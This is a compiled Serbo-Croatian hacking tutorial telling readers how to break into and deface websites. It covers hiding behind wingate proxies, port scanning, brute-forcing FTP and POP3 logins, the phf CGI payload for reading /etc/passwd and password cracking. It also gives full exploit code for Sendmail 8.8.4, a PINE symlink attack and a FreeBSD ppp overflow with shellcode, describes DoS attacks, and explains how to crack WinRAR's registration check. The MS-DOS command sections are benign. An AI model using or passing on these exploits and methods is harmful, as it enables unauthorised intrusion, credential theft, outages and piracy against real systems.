_-OBASNJENJE-_ -Ovaj tutorial sam napisao jer mi je dokurrcilo da me svako pita ovakve stvari "Molim te mi reci kako da unistim ovaj site!","Ajde plz. imam samo X godina" ili "Ajde molim te unisti ovaj site,jako me nervira webmaster". -E sad,sto se tice flame-a,mozete zaboraviiti na to,jer ja znam koliko je ovo lame,i napisao sam samo da bi me ostavili na miru.I znam da je ovaj tutorial los,i da ne bi trebao da postoji,ali boli me kurac.Vec mi je dosadilo da me 1000 ljudi pita istu stvar,od sad cu samo da dam link do ovog tutoriala.ZATO postoji ovo. -Ja ne odgovaram za ono sto radite posle ccitanja ovog tutoriala,ovaj tutorial samo govori kako se to radi,ne savetujem vam da to radite.

_-KAD OVO PROCITAS-_ -Kad procitas ovaj tutorial NISI HAKER!!! To treba da bude kristalno jasno.I nemoj da ides po forumima i da se kurcis kako si haker jer si deface-ovao neku glupu stranicu.Necu da objasnjavam kako postati haker...ima tona tutoriala o tome.I apelujem na vas da |\| 3p|5373 0\/4K0 .

_-STA JE POTREBNO-_ E,za ovaj tutorial nije potrebno imati unix.Mislim,bilo bi mnogo bolje da imas unix,ali znam da te mrzi da instaliras... Sve u svemu potrebno je par wingate adresa i shell account.Bez brige, objasnicu sta je sta. Posto i oko ovog ima tona tutoriala,necu zalaziti u detalje.Uglavnom,wingate je adresa na kojoj se nalazi programcic koji je veoma slican proxy-u.Postoji mnogo lose konfigurisanih wingate-a i to se moze iskoristiti kako bi se postigla neka anonimnost.Anonimnostcete postici tako sto cete se povezati preko telnet klijenta.Kasnije o tome.Shell account...sad cu jako da pojednostavim. To je kao racun na nekom kompjuteru koji sluzi da biste mogli da koristite taj kompjuter sa njegovim uslugama,ali sa odredjenim privilegijama.Ako ovo nije jasno,onda procitaj recenicu jos jedno 10 puta,ako ni onda nije jasno,idi u kuhinju,nadji ogroman noz i ubi se ko siroce. I trebace jedan port scanner.To je program koji gleda otvorene portove na nekom racunaru. Portovi su kao vrata preko kojih se povezes na neki racunar i koristis usluge.Ako je na primer otvoren port pod brojem 21,onda to znaci da taj racunar ima FTP deamon,to je program koji pruza usluge FTP-a (File transfer protocol). To je ono sto vam treba. _-KAKO OSTATI ANONIMAN-_ Pa..ne mozes ostati potpuno anoniman.Ali moze se ostati dosta anoniman (mogu misliti kako je ovo bilo gramaticki tacno,moj fond reci nije ogromoan,tako da se izvinjavam).Ja cu reci kako se moze ostati anoniman preko wingate-a.Postoje mnogi site-ovi na kojima se moze naci lista wingate-a, a jedan od takvih site-ova je www.cyberarmy.com/lists Tamo izaberete wingate,i ima jako puno adresa i portova (pricao sam o portovima).Recimo da ima neka ovakva adresa: 213.43.22.11 (lupio sam adresu) koja je na portu 1080.Treba uraditi sledece: Pokrenete telnet.To radite tako sto idete na Start,pa Run,i onda upisete telnet.Pojavice vam se jedan program,koji bas i nije prelepog dizajna,ali to nije ni vazno.Idete na Connect i onda Remote System. Posle toga u Hostname ukucate adresu na kojoj smo rekli da je

Wingate,u ovom slucaju 213.43.22.11 .U polje port upisite 1080 (to sam rekao da Wingate na toj adresi radi na tom portu) .Termtype treba da bude vt100. I onda pritisnete connect.Sacekate malo i povezace se.Posle toga se telnetujete na svoj shell account tako sto upisete nekaadresa.com 23 (23 je telnet port).U mesto 23 mozete da upisete i recimo 21,tako cete se konektovati na FTP protokol.Sad ste koliko toliko anonimni.Savetujem da linkujete par wingate-a.To cete tako raditi sto cete se umesto da se telnetujete na shell-account,telnetovati na adresu drugog wingate-a i tako redom dok vam ne ponestane wingate adresa i onda se konektujete na shell account. _-SHELL ACCOUNT-_ Unix je visekorisnicki sistem.To znaci da vise korisnika moze da koristi isti operativni sistem. Postoje servisi koji besplatno daju racune na svoj sistem.Jedan od ovih je npr. luxadmin.org . Kada dobijete racun ovde moci cete da koristite unix,medjutim sa ogranicenjima.Imacete racun sa smanjenim privilegijama i dobicete oko 50 MB u najboljem slucaju.I bice dosta.Znaci idite na luxadmin.org i uzmite jedan shell account.Dobicete svoj username i password.Sada se treba telnetovati na taj shellaccount kako bi ga uopste mogli koristiti.Znaci prvo telnet na wingate i onda....vec sam pisao o tome. E,kad se telnetujete dobicete prompt za login.Tu ukucate svoj username i zatim password.Necete videti dok kucate password zbog zastite.Kada se ulogujete usli ste u svoj shell account. _-MALO OSNOVNIH UNIX KOMANDI-_ Savetujem da kupite neku Unix/Linux knjigu i malo proucite.Vredece. E sad.Da biste videli u kojem se nalazite direktorijumu ukucate ovu komandu: pwd .Da biste videli koje fileove imate u direktorijumu ukucajte ovo: ls -al (ovim cete videti i privilegije....necu o tome). Da biste mogli da se krecete kroz direktorijume koristite ove komande: cd direktorijum (ovim odlazite u zeljeni direktorijum) ,cd .. (izlazite iz direktorijuma).Da biste obrisali neki file koristite ovu komandu: rm file. Ako ocete da obrisete sve u direktorijumu ukucajte ovo: rm *.*

_-NALAZENJE INFORMACIJA O SITE-U-_ Ovo je najvaznija faza kod upadanja u neki site.Postoji vise nacina i stvari koji se trebaju otkriti.Treba otkriti Operativni sistem,otvorene portove, deamone i verzije koji rade na serveru. --Operativni sistem -Objasnicu 2 nacina.Prvi je da se telnetujjete na server ako ima otvoren telnet port 23.Tamo pise koji je Operativni Sistem. -Drugi nacin je netcraft.com Idite na taj site i kliknite na link na kojem pise "Whats that site running" ili tako nesto. Idite na taj link i upisite site koji vas zanima. Tamo ce pisati sta taj site ima.Postoji jos nacina,kao sto je nmap ....ali bice ovo dosta za vas. Zatim skenirajte otvorene portove sa port scannerom. Telnetujte se na svaki port i pogledajte sta pise,koja je verzija programa,ime....SVE ZAPISITE. E,kad sve to zavrsite imate dosta informacija o site-u da biste mogli iskorisiti.

_-ISKORISTITI RUPU-_ E sad.Postoje stvari koje se zovu exploiti.To su programi koji iskoriste rupu u programu.Sa ovim exploitima moguce je dobiti root na nekom serveru (root je svemocni user,ima sve privilegije). Postoji vise vrsta exploita.Kao sto su Remote (ovo cemo mi koristiti) ,Local i DoS. Mi cemo koristiti remote.Exploiti su 95% pisani u C-u,a ponekad i u PERL-u.E sad...posto vec imamo informacije o site-u ostaje nam da nadjemo exploit i udjemo u server.Postoje site-ovi gde se oni mogu naci. Dva najpoznatija i najbolja site-a su http://packetstorm.securify.com i http://www.hack.co.za Tamo nadjite exploit za ono sto ste zapisali.Vazne su verzije programa! E sad kada ste skinuli exploit i stavili ga na shell account preostaje samo kompajlirati exploit i pokrenuti ga. --Ako je exploit napisam u C-u onda treba uraditi ovo:

gcc file.c -o file Sada imate kompajliran exploit.Mozete ga pokrenuti sa: file ili ./file Sada ce da vam ispise usage.Ako pise recimo: Usage <site> <port> onda cete ovako startovati exploit: ./file www.nekisite.com 21 Malo sacekate i usli ste.Sada samo koristite ono sto sam vam pokazao u sekciji o unix komandama. --Ako je napisan u PERL-u Ako je napisan u PERL-u nema potrebe za kompajliranjem,jer je PERL interpretiran jezik (ako ne znate nista o programiranju...onda ni ovo ne znate).Znaci samo startujete sa: perl file.pl Onda ce vam opet ispisati Usage,i opet ista prica.

*-*-*-*-*--- Hacking Web-site --*-*-*-*-**-*-*-*-*-*

* Mnogo ljudi me je pitalo kako hacknuti web stranicu (neki su malo pretjerali pa su pitali kako hacknut Altavista.com, Yahoo, Hotmail itd.. a ako i vi tako nesto zelite onda se kanite compa nije to za vas, slupajte ga popijte mu krv radite sta hocete). Naime, kada ovaj text procitate niste hacker jer haker nemozete tako lahko postat i nemoj da se ku*cite kako ste nesto hacknuli samo sto ste procitali text. Ovaj tutorial je napisan da vam pojasni i nauci a ne da vi procitate i onda se ku*cite da ste hacker. Manje price i krenimo. Sada kada ste skontali vasu metu (nadam se da nije Yahoo a ako jest znate sta cete :)) onda mozemo krenut. 1. Faza Sajt koji zelite da hacknete, prvo morate saznat na kojem je serveru i koji je Operativni system. Logicno je ako je server IIS Microsoft da ce biti operativni system Win a ne Linux ili nesto drugo. Prvo naucite te vrste servera i operativnih systema. Kako to saznat? Ima milion programa sto to rade a neki od njih su NMAP, Queso itd... Da vi sad ne bih skidali (uuuh valja naci i skinuti programe :)) odite

na www.netcraft.com i lijepo fino upisite adresu web sajta kojeg zelite hacknut. Onda cete dobit sta vam treba. Kada ste to vidjeli, znate sta da radite. Ako je server Apache i OS Linux, nemojte se previse nadat da cete hacknut jer Linux je ako nista sigurniji od Windowsa. Naravno ima exploita i na njemu ali to vama prepustam da sami nadjete exploite na nekim hack sajtovima. E ako je IIS Microfost server i to verzija 4.0 onda je to druga prica. Zaista ima hrpa exploita za taj server i ja znam neke medjutim imajte u vidu da je administrator mozda zakrpio te rupe. Ova faza je samo uvod, da vidite kakve su to vrste servera i OS. 2.Faza E ako se opredjelite za 1. fazu, onda ovu drugu nemojte ni citat. Ako se opredjelite za 1. fazu, onda cete trebat trazit exploite za server na kojem je ta vasa stranica koju trebate hacnkut. To je i dug proces ali ako se razumijete i znate sta su exploiti i malo oko njih, onda vam nece biti tesko naci. E glavna metoda za 1. fazu jeste da skenirate taj server. Medjuti to je samo jedan dio posla, ali tu vam je dosta toga uradjeno. Naime, kada skenirate server, onda mozete vidjeti koji exploiti postoje na njemu! I to je to. Nadjete exploit taj i taj i isprobate ga. Sad bi vi rekli "E jebote lahko je reci da treba skenirat, al kako?". Fino, imate milion Exploit skenera, neke mozete skinuti i na www.nhs-ac.cjb.net sajtu a preporucujem N-Stealth skener. Trazi ga na Astalavista.com Da se mi vratimo drugoj fazi. Ovdje cak nemorate ni znat koji je server i koji je OS. Sve sto trebate jeste da vidite koji su portovi otvoreni na tom serveru. Lijepo fino uzmite port skener i skenirajte host ako to neznate nemojte ni citat dalje ovaj tutorial, jednostavno ga izbriste. IP adresu takodjer mozete doznat na stranici www.netcraft.com E postoji jedna dobro poznata metoda. Naime, ako je otvoren port 21 tj. FTP i ako se mozete ulogovat kao anonimni korisnik, onda sve sto trebate jeste da pogledate u direktorij /etc/passwd naravno ako je to dopusteno. Ako je dopusteno i ako uspijte doci do toga posao je zavrsen, znate sta trebate dalje :)) Medjutim ako to nije moguce ako se nemozete ulogovat ili nesto drugo, pogledajte koji su portovi otvoreni kada skenirate. Sada morate znati malo o protokolima a imate neke tutore o tome na www.nhs-ac.cjb.net sajtu. Takodjer bitno je doci do administratorske stranice a ona je obicno na portu 6075. Naravno trebate naci tu stranicu i port, probajte jos sa: 65534, 6073, 1260, 5555, 1234 itd... Ako nadjete taj port, u vas browser upisite (primjer): http://123.122.34.233:6075 E da se mi vratimo FTP-u. Ako je taj port uopste otvoren onda lijeo fino skinete wwwhack alat i izaberete FTP metodu. Program ce onda probat probit user i pass a uzimace rijeci iz rijecnika. Preporucujem da izaberete metodu sve moguce kombinacije ali to ce

zaista dugo trajat. Bilo kako bilo, znate sta treba da radite, imate mnogo izbora pa bujrum. 3. Faza Ova faza je povezana sa drugom. Naime ako na stranici postoji POP3 otvoren port, onda isto korstite wwwhack kao i kod FTP-a. Naravno program ce vas o svemu obavjestiti kada sta otkrije. 4. Faza U ovoj fazi vam ne treba nista samo program :)) Ovdje cemo korisit DoS napade. Ko nezna sta je to, neka skine tutor o tome na nhs-ac sajtu i nauci to. Medjutim sa ovom tehnikom mozete samo "oborit" server. Ipak, procitajte o tome u posebnom tutoru.

Hackanje Sifre putem ftp.

Pokazat cu vam laksi put kako uz ftp access preuzmete password i login name od neprijatelja. Ali prvo naucite nesto o file passwordu Kako izgleda primjer root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Ovako izgleda pravi password file koji ce vam dati root root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp Ovako bih izgledao drugi primjer poznatog sjena file root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Sjena password ima "x" a ponekda moze biti * Sada kad znate nesto malo o formaciji password formata Sad mozemo govoriti kako crackati server I vazno za napomentu da je postupak veoma lak. 1.Prvi korak je download i copiraj file. 2. Drugi korak je da nadjete dobar crack programcic kao sto je Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Znaci cim startate program prvo sto ce da pita je password Password file mozete napraviti tako sto ce te download vec gotove pakete sa neta ili ce te ga sloziti u formaciju(ASCII, caps, lowercase, and numeric letters may also be added) . kad dobijete trazeni password sljedite direkcije crack-a ovdje su vam serveri za pronalazak.....fileova http://webpage_goes_here/cgibin/phf?Qalias=x%0a/bin/cat%20/etc/passwd dajem primjer da bih pw file za http://www.webpage.com/ treba da ukucas http://www.webpage.com/cgibin/phf?Qalias=x%0a/bin/cat%20/etc/passwd samo ih copiraj i plasiraj u crack Telnet i Exploits ako govorimo o exploits to je najlaksi nacin hackanja web stranice Ali prije nego sto bih ti pokrenu exploit potrebno ti je da imas telnet proggie,

samo skrecem paznju na bug i errors koji se javljaju koji ce vam stvoriti problema do root access. root access. poznati exploit Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. Ovako treba da izgleda kad ga nastimate cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ] *"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi Ovo je pine exploit namjenjen za linux potrebu Creating a symbolic link from /tmp/.hamors_lockfile to

~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:055 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 ++ catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors da vas nebih zbunilo ovo nije FreeBSD FreeBSD-SA-96:15. Ovako bih trebalo da izgleda kad nastimate #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFFER_SIZE 156 /* velicina bufer-a */ #define OFFSET -290 /broj bufera kad ga pokrenete */ long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x 56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\x ca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x 01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x 04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* puno startanje bufera sa nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* ubaci exploit code u bufer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); }

*-*-*-*--- Komande u MS-DOS ---*-*-*-*

* MS-DOS. Mislim da nema potrebe da objasnjavam sta je to a ko nezna neka odmah izbrise ovaj tutorial jer to nije za njega :)) Posto ja jako volim DOS morao sam napisat nesto o njemu :)) Naime u ovom tutoru cete nauciti osnovne MS-DOS komande i malo objasnjenje. * Komande * CD - Sluzi da se pozicionirate na odredjeni direktorij Primjer: c:\> cd garnet * COPY - Sluzi da kopiranje fajlova Primjer: c:\> copy c:*.* a: -kopira cijeli sadrzaj sa C: na disketu A: Primjer: c:\> copy c:garnet.exe a: -kopira fajl garnet.exe na A: Primjer: c:\> copy c:\windows\garnet.exe c:\dos -kopira fajl garnet.exe u DOS direktorij Primjer: c:\> copy a:*.* c: -kopira cijeli sadrzaj sa diskete na C: * DEL - Brisanje fajlova Primjer: c:\> del *.* -brise sve fajlove na C: Primjer: c:\> del garnet.exe -brise fajl garnet.exe Primjer: c:\> del *.exe -brise sve datoteke EXE na C: * DIR -Izlistava fajlove i direktorije Primjer: c:\> dir -izlistava fajlove i direktoje na C: Primjer: c:\> dir/p -izlistava postepeno fajlove i direktorije Primjer: c:\> dir/w -izlistava fajlove i direktorije u drugom formatu Primjer: c:\> dir/s -izlistava sve direktoje i fajlove na cijelome hard disku * MK (MKDIR) - Kreiranje direktorija Primjer: c:\> mk garnet -kreira direktorij garnet * RM (RMDIR) Primjer: c:\> rm garnet -brise direktorij garnet * COPY CON - Kreiranje fajla Primjer: c:\> copy con garnet.txt -Kreira fajl garnet.exe (kada unesete komandu i pritisnete ENTER, unesite text u taj fajl i kad zavrsite pritisnite tipku F6 i snimicete text koji ste unijeli u taj fajl)

* REM - Komentar Primjer: c:\> rem garnet i nhs-ac.cjb.net -nista posebno :)) * PAUSE - Pauza Primjer: c:\> pause -za daljni radi pritisnite ENTER * DATE - Ispis datuma Primjer: c:\> date * TIME - Ispis vremena Primjer: c:\> time * TYPE - Ispis sadrzaja fajla Primjer: c:\> type garnet.txt -ispisuje sadrzaj fajla garnet.txt * ATTRIB - Zastita fajlova Primjer: c:\> attrib garnet.exe +h -sakriva fajl garnet.exe "Hiden" Primjer: c:\> attrib garnet.exe +r -zasticuje garnet.exe od editovanja "Read only" (Ako zelite odkljucati fajl, onda umjesto "+", stavite "-") * ECHO - Ispis teksta Primjer: c:\> echo on -pokazuje tekst Primjer: c:\> echo off -sakriva tekst * /? - Help (Za svaku ovu komandu mozete upisat /? i dobit cete pomoc za tu komandu) Primjer: c:\> attrib /?

Sta su to DoS napadi i vrste DoS napada

* U ovom slucaju rijec DoS neznaci onaj Microsoft MS-DOS, ova skracenica znaci: "Denial of Service". Glavni cilj ovih napada jeste da "uguse" konekciju i time obore odredjenu masinu. Kako to rade, ima mnogo nacina ali glavni cilj je onemoguciti funkciju odredjene masine, jednostavno onesposobiti je. Sve u svemu tehnika ovih napada jeste da se sto vise paketa posalje na odredjenu masinu i time onesposobi. To se vrsi na mnogo nacina koje cete nauciti u sljedecim tekstovima. Samo da napomenem da niste haker ako koristite neke nukkere koji rade na ovom principu i hvalite se kako ste nekoga nukovali. Ako nesto zelite nauciti pa kasnije to odraditi, onda prvo morate shvatiti pa tek onda nesto uradit iz toga sto naucite. Zato prvo shvatite funkciju i "gradju" nukkera pa tek onda "uzmite u ruke".

Problem je u tome sto se veoma tesko moze zastitit od ovih vrsta napada jer se jednostavno koriste normnalne systemske komande. Evo vam sad vrste DoS napada i malo objasnjenje za svaku. * Land Ovdje se radi o takvom napadu sto salje na otvoreni port SYN paket koji moze da system obori. * Smurf-napadi Ovdje se salje sto vise pingova da bi se dobio sto veci broj odgovora i tako bi srusio system zrtve. Za 100 pingova dobija se 1000 odgovora. * OOB-napadi * Kao i sto svi znate ovaj napad je najpoznatiji a i najednostavniji. Medjutim radi samo na Win 95 dok je Win 98 zasticen od ovog napada. Njegova funkcija je u tome sto salje neke bezvezne znakove na odredjenu masinu i dovodi do Blue screen of death (ako neznate sta je Blue screnn of death, mozete procitat u ovom tutorialu) * SYN flood * Jedna TCP konekcija izmeu dva sistema ostvaruje se preko tkz. "three-way-handshake". 1) Sistem A---->Sistem B : SYN ("Hou vezu s tobom") 2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir) 3) Sistem A---->Sistem B : ACK ("Dobro,ja se takoer slaem") Sad se jednostavno u jednom SYN paketu daje pogrena adresa (jedna koja i nepostoji), i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i nepostoji adresa. Ali sistem B eka jo odreeno vrijeme na odgovo, sve dok ne doe "connection timeout". U tom vremenu se mora sistem B sa to vie ping-ova prenapuniti. Posljedica je da se sisitem B prenapuni, tako da za odreeno vrijeme vie ni na jedan SYNpaket odgovori. * Ping of Death * Za ovaj napad sluzi obicna komanda koja glasi: "ping adresa -n 9999999" Kada se posalje ova naredba na odredjeni server, onda on pocinje da obradjuje, ali

posto se poslalo oko milion pingova, onda server sporo obradjuje i jednostavno se srusi, dolazi do Buffer Overflow. Medjutim za ove napade je davno izasao patch i nevazi na jacim serverima. (Nemoze te koristit ovaj napad sa slabijim mashinama) * To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a to je da se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas lameri neuznemiravaju bezze :))

*-*-*-*--- Programi u MS-DOS-u --*-*-*-*

* MS-DOS. Mislim da nema potrebe da objasnjavam sta je to a ko nezna neka odmah izbrise ovaj tutorial jer to nije za njega :)) Posto ja jako volim DOS morao sam napisat nesto o njemu :)) E sigurno znate ako nista barem osnovne komande u MS-DOS-u a ucili ste ih i u osnovnoj skoli. (cd.. copy,del,rd itd...) Medjutim MS-DOS sadrzi mnogo programa a nekih od njih su glavni hakerski alati. Ti programi su legalne vrste medjutim haker ih koriste za razna ispitivanja i pronalazenja informacija o nekoj zrtvi. U ovom tutorialu cu opisat par programa i otkriti njihove male tajne. * Program NET Ovo je svima poznat program u MS-DOS-u. Ove programe sve mozete naci u C:\Windows Medjutim ako imate Win98 postoji mogucnost da se ti programi ne nalaze tu. Znaci ako imate Win98 pogledajte u Windows direktorij Zip fajlove: Net7.zip, Net8.zip, Net9.zip i Net10.zip. U nekim tim arhivama naci cete i ostale programe pored programa NET. Program NET ima mnogo funkcija. Preko njega mozete da ulazite u direktorij na drugim racunarima naravno ako je to dozvoljeno ali sad je to druga prica. Evo vam objasnjenje za komande u NET: NET CONFIG Displays your current workgroup settings. NET DIAG Runs the Microsoft Network Diagnostics program to display diagnostic information about your network. NET HELP Provides information about commands and error messages. NET INIT Loads protocol and network-adapter drivers without binding them to Protocol Manager. NET LOGOFF Breaks the connection between your computer and the shared resources to which it is connected. NET LOGON Identifies you as a member of a workgroup. NET PASSWORD Changes your logon password.

NET PRINT Displays information about print queues and controls print jobs. NET START Starts services. NET STOP Stops services. NET TIME Displays the time on or synchronizes your computer's clock with the clock on a Microsoft Windows for Workgroups, Windows NT, Windows 95, or NetWare time server. NET USE Connects to or disconnects from a shared resource or displays information about connections. NET VER Displays the type and version number of the workgroup redirector you are using. NET VIEW Displays a list of computers that share resources or a list of shared resources on a specific computer. * Program NBTSTAT Ovaj program vam takodjer ima mnogo opcija. Pomocu njega mozete da vidite da li je na nekom racunaru otvoren port 139 NetBIOS. To mozete uraditi ovako: c:\> nbtstat -A 195.222.45.22 Evo vam i help sa prevodom za NBTSTAT: Nbtstat [-a remoteime] [-A ip adresa] [-c] [-n] [-R] [-r] [-S] [-s] Switchevi : -a Izlista imena remote kompjutera po tabeli zadanoj za host ime. -A Izlista imena remote kompjutera po tabeeli zadanoj po ip adresama -c Izlista remote ime cache ukljucujuci ipp adresu. -n Izlista lokalna NetBIOS imena -r Izlista imena dobijna emitirane putem WWINS -R Uzima i realod remote cache tabelu....< -S Izlista sessione tabele sa destinacijomm IP adresama -s Izlista sessione tabele konverzije... * Ping Ovu komandu dobro znate. Pomocu nje doznajete da li neka IP adresa postoji na internetu. Npr: c:\> ping 195.222.45.22 * u MS-DOS-u programa ima zaista puno ali ja sam opisao samo 3, barem su ova osnovna. Za svaki ovaj program upisite /? ako zelite dobiti kratki

help. Npr: C:\> ping /?

Uvod u Svijet Cracking-a

Uvod: Sta je Cracking? Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti da nije lako razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje crackinga. Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete razumijeti nacin na koji cu neke tacke objasniti. Korak 1: Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili neznaju nista o ASM-Codu ili o internalnoj funkciji aplikacije. Potrebni Software: Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je najbolji za pocetak).To je sve za pocetak. Sad malo znanja: Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije komande. Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt (byte). Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i 45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja. Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl. je (hexadecimala je 74) = jump if equal (skoci ako je jednak) jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak) nop (hexadecimala je 90) =no operation (nema operacija) call (nema hexadecimale) = call a operation (poziva operaciju) jmp (nema hexadecimale) = jump to string/operation (skok na operciju) Ovih pet stvari ce nam trebati za pocetak. Ok sad cemo pogledati sta oni zapravo rade u asm-codu. je (jump if equal) skace na neku od operacija ako nadje sta trazi. Primjer: Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja

provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje u asm-codu (jump if equal). jne (jump if not equal) Primjer: Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne komanda. Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer provjeravanje jel password validan. Call (call a operation) ova komanda poziva operaciju neku. jmp (jump to a string/operation) jmp komanda nepoziva komande nego skace na njih. Nesto o Zastitnim semama: Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih provaliti. Imamo "normalne" cd zastite to jeste passwordom zasticene programe,igre i vremenski ogranicene programe. Najlakse zastitne seme za nas su windows error poruke. U ovome textu cu pokazati kako da razbijemo windows message boxove i da crackujemo WinRar sa W32Dasm verzija 8.9 i sa HIEW-om. Pocinjemo sa Crackingom: Kao prvo pocecemo sa WinRAR-om. Otvorite program. Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred version)" Sad cemo kliknuti na "Options" i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi prozorcic koji ce vam reci da je registracija propala.To je sve sto moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32 (za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako promijenis pogresne bajtove) Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce prozor i moci ces izabrati fajl koji hoces da disassembliras. Izabracemo WinRar95.w32. Sad W32Dasm pocinje disassembling proces. Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive znakove nego WINDINGS pisane linije.Ako se ovo desi idite na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je Arial.Sad cete vidjeti asm-code. Nece vam reci puno jer predpostavljam da neznate sta te sve komande znace.

